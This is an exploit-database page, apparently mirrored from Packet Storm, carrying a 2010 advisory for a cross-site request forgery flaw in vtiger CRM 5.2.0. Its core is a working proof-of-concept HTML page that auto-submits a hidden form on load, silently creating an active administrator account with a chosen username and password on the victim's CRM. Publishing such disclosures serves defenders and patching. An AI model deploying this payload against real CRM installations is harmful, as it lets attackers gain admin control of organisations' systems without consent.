Lucene search
K

vtiger CRM 5.2.0 Cross Site Request Forgery

🗓️ 22 May 2010 00:00:00Reported by AutoSec ToolsType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

vtiger CRM 5.2.0 Cross Site Request Forgery vulnerabilit

Code
`<!--=========================================================================================================#  
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #  
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #  
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #  
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #  
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #  
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #  
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #  
# #  
#============================================================================================================#  
# #  
# Vulnerability............Cross-site Request Forgery #  
# Software.................vtiger CRM 5.2.0 #  
# Download.................http://sourceforge.net/projects/vtigercrm/files/ #  
# Date.....................5/21/10 #  
# #  
#============================================================================================================#  
# #  
# Site.....................http://cross-site-scripting.blogspot.com/ #  
# [email protected] #  
# #  
#============================================================================================================#  
# #  
# ##Description## #  
# #  
# A cross-site request forgery vunlerability in vtiger CRM 5.2.0 can be exploited to create an new admin. #  
# The form values can also be sent via GET request, but the resulting user does not have admin privileges. #  
# #  
# #  
# ##Proof of Concept## -->  
<html>  
<body onload="document.forms[0].submit()">   
<form name="EditView" method="post" action="http://localhost/index.php">   
<input type="hidden" name="module" value="Users" />  
<input type="hidden" name="mode" value="create" />  
<input type="hidden" name="action" value="Save" />  
<input type="hidden" name="user_name" value="new_user" />  
<input type="hidden" name="is_admin" value="on" />  
<input type="hidden" name="user_password" value="new_password" />  
<input type="hidden" name="confirm_password" value="new_password" />  
<input type="hidden" name="email1" value="[email protected]" />  
<input type="hidden" name="status" value="Active" />  
</form>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 May 2010 00:00Current
0.5Low risk
Vulners AI Score0.5
16